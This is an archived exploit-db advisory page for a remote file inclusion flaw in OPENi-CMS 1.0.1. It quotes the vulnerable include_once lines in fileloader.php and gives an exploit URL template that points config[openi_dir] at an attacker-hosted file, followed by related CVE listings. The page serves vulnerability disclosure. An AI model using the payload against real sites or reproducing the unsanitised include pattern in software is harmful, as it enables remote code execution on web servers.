Lucene search
Basher13EDB-ID:2344HistorySep 11, 2006 - 12:00 a.m.
OPENi-CMS 1.0.1beta - 'config' Remote File Inclusion
2006-09-1100:00:00
basher13
www.exploit-db.com
62
AI Score
7.4
Confidence
Low
Update:
22:44 09/11/06
Subject:
"OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability "
Vulnerable version:
OPENi-CMS 1.0.1
Operating System:
- All OS
Vendor URL:
Support - [email protected]
Website - http://www.openi-cms.org/
Description:
Openi-CMS he one software PHP Content Management System with facilities
wysiwyg the editor, plugin, user management to facilitate arranged as
well as the difference style website
Vulnerability:
Invalid include function at fileloader.php on line at 5,6 and 7,the
'$config["openi_dir"]' is not gurantee to including a files.
// openi-admin/base/fileloader.php
include_once($config["openi_dir"]."/base/constants.php"); // invalid code
include_once($config["openi_dir"]."/base/db_classes.php"); // invalid code
include_once($config["openi_dir"]."/base/site_classes.php"); // invalid code
Exploit:
http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]
Solution:
upgrade next version
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
[email protected] / www.xcrime-cyber.pro.tc
# milw0rm.com [2006-09-11]Related
cve
cve
CVE-2006-4750
2006-09-13 22:07:00
CVE-2007-0881
2007-02-12 20:28:00
cvelist
cvelist
CVE-2006-4750
2006-09-13 22:00:00
CVE-2007-0881
2007-02-12 20:00:00
nvd
nvd
CVE-2006-4750
2006-09-13 22:07:00
CVE-2007-0881
2007-02-12 20:28:00
prion
prion
Remote file inclusion
2007-02-12 20:28:00
securityvulns
securityvulns